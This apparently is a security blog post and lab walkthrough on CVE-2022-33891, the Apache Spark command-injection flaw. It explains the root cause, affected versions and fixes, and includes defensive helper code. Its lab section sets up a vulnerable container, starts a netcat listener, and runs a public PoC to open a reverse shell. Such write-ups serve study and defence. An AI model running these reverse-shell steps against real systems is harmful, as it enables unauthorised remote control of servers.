Apache Spark Command Injection Vulnerability

March 25, 2024

In the world of cybersecurity, understanding vulnerabilities and how they can be exploited is crucial. One vulnerability that has drawn the attention of security researchers is CVE-2022-33891, which exists in Apache Spark, a popular open-source distributed general-purpose cluster-computing framework. In this blog post, we explore the details of this vulnerability, examine its root cause and impact, and discuss how it can be mitigated.

Overview

This vulnerability in Apache Spark, a widely used unified analytics engine for large-scale data processing, has drawn attention because of its high severity rating and its potential for exploitation. It stems from a command injection flaw in the Spark web UI that becomes reachable when Access Control Lists (ACLs) are enabled, and it can lead to unauthorized access to and control of the host.

The vulnerability was reported by Kostya Kortchinsky, a cybersecurity researcher from Databricks [3]. It is also included in the Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities Catalog [2]. The exploitation of this vulnerability could have serious implications. Since Apache Spark is widely used for large-scale data processing, a successful exploit could give an attacker access to sensitive data. Furthermore, the ability to execute arbitrary shell commands could allow an attacker to gain further control over the system.

In the following sections of this blog post, we will explore the technical details of this vulnerability in greater depth. We will look at how the vulnerability can be exploited, the potential impact of an exploit, and the mitigation strategies that can be employed. 

By understanding the intricacies of vulnerabilities like CVE-2022-33891, we can better equip ourselves to protect our systems and data. As the saying goes, knowledge is power. In the realm of cybersecurity, this knowledge can be the difference between a secure system and a potential breach.

Affected Versions

This vulnerability affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. The Apache Spark project addressed it in versions 3.1.3, 3.2.2, and 3.3.0. Because these release lines were widely deployed for big data processing and analytics, a large number of installations were potentially exposed.
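The affected ranges above can be encoded as a small check, for example when auditing an inventory of Spark installations. This is a minimal sketch: `parse_version` and `is_affected` are hypothetical helper names, not part of any Spark tooling, and the code assumes a plain `major.minor.patch` version string (any suffix after the third number is ignored).

```python
import re

# Inclusive (low, high) bounds taken from the affected ranges listed above.
AFFECTED_RANGES = [
    ((0, 0, 0), (3, 0, 3)),  # 3.0.3 and earlier
    ((3, 1, 1), (3, 1, 2)),  # 3.1.1 to 3.1.2
    ((3, 2, 0), (3, 2, 1)),  # 3.2.0 to 3.2.1
]


def parse_version(version: str) -> tuple:
    """Turn '3.1.1' (or '3.1.1-suffix') into the tuple (3, 1, 1)."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if match is None:
        raise ValueError(f"unrecognized Spark version: {version!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version: str) -> bool:
    """Return True if the version falls inside one of the listed ranges."""
    parsed = parse_version(version)
    # Tuples compare element by element, so (3, 1, 3) > (3, 1, 2).
    return any(low <= parsed <= high for low, high in AFFECTED_RANGES)


if __name__ == "__main__":
    for v in ["2.4.8", "3.0.3", "3.1.1", "3.1.3", "3.2.1", "3.2.2", "3.3.0"]:
        print(v, "affected" if is_affected(v) else "not in listed ranges")
```

Note that the version check alone does not establish exploitability: as the next section explains, the vulnerable code path is only reached when ACLs are enabled.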

Why CVE-2022-33891 Occurs

Access Control Lists (ACLs) in Apache Spark

Apache Spark provides a feature to enable ACLs via the configuration option spark.acls.enable. This feature is used to check whether a user has access permissions to view or modify the application. When ACLs are enabled, it triggers a specific code path in a component of Apache Spark known as HttpSecurityFilter.
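Whether a given deployment has ACLs turned on can often be read from its `spark-defaults.conf`. The sketch below is a simplified, hypothetical reader (`parse_spark_defaults` and `acls_enabled` are our own names). It assumes one setting per line, with the key and value separated by whitespace or `=`, skips `#` comments, and ignores other places a setting can come from, such as `--conf` flags passed to `spark-submit`.

```python
import re


def parse_spark_defaults(text: str) -> dict:
    """Parse spark-defaults.conf-style text into a {key: value} dict.

    Simplified: keys and values are separated by whitespace or '=';
    ':' separators, line continuations and escapes are not handled.
    A key that appears more than once keeps its last value.
    """
    settings = {}
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        # Split on the first '=' (with optional spaces) or run of whitespace.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        settings[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return settings


def acls_enabled(text: str) -> bool:
    """True if spark.acls.enable is set to 'true' (case-insensitive)."""
    value = parse_spark_defaults(text).get("spark.acls.enable", "false")
    return value.lower() == "true"
```

For example, `acls_enabled("spark.acls.enable true\n")` returns `True`, while a commented-out `#spark.acls.enable true` line is ignored.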

The Role of HttpSecurityFilter

HttpSecurityFilter is the servlet filter that Apache Spark applies to HTTP requests made to its web UI. It manages the security aspects of those requests, including the enforcement of ACLs. When ACLs are enabled, a code path in HttpSecurityFilter allows a requester to impersonate another user by supplying an arbitrary user name, which means an attacker can pretend to be any user.

The Vulnerability

The vulnerability occurs when a malicious user, after impersonating an arbitrary user, reaches a permission check function. This function builds a Unix shell command based on the user’s input and executes it. The problem here is that the input to this function is not properly sanitized, which means that an attacker can inject arbitrary commands. This results in arbitrary shell command execution as the user Spark is currently running as.
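The core mistake, concatenating user input into a string that a shell then parses, can be reproduced outside Spark. The Python sketch below is an illustrative analogue, not Spark's actual Scala code: it assumes the permission check performs a Unix group lookup of the form `id -Gn <user>`, and the function names and user-name allowlist are hypothetical. It only builds the argument lists and never executes them.

```python
import re

# Hypothetical allowlist for POSIX-style user names. The first character must
# be a letter or '_', which also stops names like '-x' being read as options.
# Real deployments (e.g. Kerberos principals with '@') may need a looser rule.
USERNAME_PATTERN = re.compile(r"[A-Za-z_][A-Za-z0-9._-]{0,31}")


def build_unsafe_command(username: str) -> list:
    # Vulnerable pattern: the user name becomes part of a string that bash
    # parses, so characters such as ';', '|', '`' or '$(' are interpreted
    # by the shell and can start additional commands.
    return ["bash", "-c", "id -Gn " + username]


def build_safe_command(username: str) -> list:
    # Safer pattern: no shell is involved, and the user name is passed as a
    # single argv element after being checked against the allowlist.
    if not USERNAME_PATTERN.fullmatch(username):
        raise ValueError(f"invalid user name: {username!r}")
    return ["id", "-Gn", username]


if __name__ == "__main__":
    name = "alice; echo injected"
    # If run, bash would execute 'id -Gn alice' and then 'echo injected'.
    print(build_unsafe_command(name))
    try:
        build_safe_command(name)
    except ValueError as err:
        print(err)
    print(build_safe_command("alice"))
```

Either list could be handed to `subprocess.run(cmd)`, which uses `shell=False` by default. The difference is that the unsafe variant explicitly starts `bash -c` with attacker-influenced text, while the safe variant runs `id` directly, so even a name that slipped past validation would reach `id` as one literal argument.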

In other words, the attacker can execute any command they want on the system where Apache Spark is running, with the same privileges as the user running the Apache Spark application. This could potentially lead to a full compromise of the system.

Setting Up The Lab

This practical session aims to provide a clear understanding of the exploit, illustrating the potential risks and consequences associated with this identified security flaw. To get started, ensure you have Docker installed on your system. Below is the Docker Compose configuration that you can use to set up the lab environment:


version: '2'
services:
  spark:
    image: docker.io/bitnami/spark:3.1.1
    container_name: CVE-2022-33891
    environment:
      - SPARK_MODE=master
      - SPARK_RPC_AUTHENTICATION_ENABLED=no
      - SPARK_RPC_ENCRYPTION_ENABLED=no
      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
      - SPARK_SSL_ENABLED=no
    ports:
      - '8080:8080'

Copy this configuration into a docker-compose.yml file. Then open a terminal, navigate to the directory containing the file, and run: docker-compose up (or docker compose up with newer Docker releases). This pulls the bitnami/spark:3.1.1 image and starts a local Spark master running an affected version. Once the container is running, open http://localhost:8080 (or http://IP:8080 from another machine, where IP is the Docker host's address) in your web browser to reach the Spark master web UI.

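Next, enable ACLs in the Spark configuration. Open a shell in the container with docker exec -it CONTAINER_ID /bin/bash (the Compose file names the container CVE-2022-33891, so docker exec -it CVE-2022-33891 /bin/bash also works) and run: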

echo "spark.acls.enable true" >> conf/spark-defaults.conf

Once completed, exit the container shell and restart the container using: docker container restart CONTAINER_ID
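The `echo ... >>` command appends the line every time it is run. If you script the lab setup, a hypothetical idempotent alternative is sketched below: `ensure_acls_enabled` is our own helper, it assumes it is given the path to the same `conf/spark-defaults.conf` file used above, and it does not restart the container for you.

```python
from pathlib import Path

SETTING = "spark.acls.enable true"


def ensure_acls_enabled(conf_path: Path) -> bool:
    """Append 'spark.acls.enable true' unless that exact setting is present.

    Returns True if the file was modified. For a repeated key, the last
    occurrence is the one java.util.Properties.load keeps, so the appended
    line also overrides an earlier 'spark.acls.enable false'.
    """
    existing = conf_path.read_text() if conf_path.exists() else ""
    # Compare whitespace-separated tokens so extra spaces do not matter.
    lines = [line.split() for line in existing.splitlines()]
    if ["spark.acls.enable", "true"] in lines:
        return False  # already enabled; nothing to do
    with conf_path.open("a") as handle:
        if existing and not existing.endswith("\n"):
            handle.write("\n")  # keep the new setting on its own line
        handle.write(SETTING + "\n")
    return True
```

Running it twice against the same file modifies the file only once, which makes it safe to include in a repeatable setup script.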

From a penetration tester's perspective, once a live IP address has been identified, the next step is a port scan to enumerate open ports and the services behind them. Scanning the target showed an HTTP service running on port 8080.
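A full port scan is normally done with a dedicated scanner, but for a single TCP port the underlying idea is just a connection attempt. The sketch below is a minimal illustration; the `is_port_open` name and the default timeout are our own choices.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts (socket.timeout is an OSError
        # subclass), name-resolution failures and unreachable hosts.
        return False
```

In this lab, `is_port_open("192.168.1.235", 8080)` would be expected to return `True` once the Spark container is up.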

Browsing to port 8080 revealed the Apache Spark master web UI, which reported version 3.1.1.
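Identifying the version can also be scripted by fetching the UI page and pulling out the version string. This sketch rests on an assumption worth verifying against your own instance: that the UI header renders the version inside a `<span class="version">` element. The helper names are hypothetical.

```python
import re
import urllib.request
from typing import Optional

# Assumption: the Spark UI header shows the version as
# <span class="version" ...>X.Y.Z</span>; other attributes are tolerated.
VERSION_SPAN = re.compile(
    r'<span[^>]*\bclass="version"[^>]*>\s*([0-9][0-9A-Za-z.\-]*)\s*</span>'
)


def extract_spark_version(html: str) -> Optional[str]:
    """Return the version string shown in a Spark UI page, or None."""
    match = VERSION_SPAN.search(html)
    return match.group(1) if match else None


def fetch_spark_version(base_url: str, timeout: float = 5.0) -> Optional[str]:
    """Download a UI page (e.g. http://192.168.1.235:8080/) and extract the version."""
    with urllib.request.urlopen(base_url, timeout=timeout) as response:
        html = response.read().decode("utf-8", errors="replace")
    return extract_spark_version(html)
```

Keeping the parsing in `extract_spark_version` separate from the HTTP request makes it easy to test against saved HTML and to adjust the pattern if a given Spark release renders its header differently.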

Fig: Application running on http://192.168.1.235:8080/

Researching this version showed that it falls within the range affected by CVE-2022-33891. With ACLs enabled, this allows an attacker to execute arbitrary shell commands on the target system, which presents a significant security risk.

To exploit this vulnerability, we will use a proof of concept (PoC) published by GitHub user HuskyHacks.

Download the PoC and install its required packages. Then start a netcat listener (nc -lnv 3000) and run the PoC: python3 poc.py -u http://192.168.1.235 -p 8080 --revshell -lh 192.168.1.2 -lp 3000 --verbose

Fig: Sending the payload with the listener IP and port

Keep in mind that if a firewall blocks outbound connections from the server, the reverse shell may never connect back. If the exploit succeeds, your netcat listener will show an incoming connection. In this case, the listener received a connection from the target server, which allowed system commands to be run:

Fig: Connection received and system commands executed

References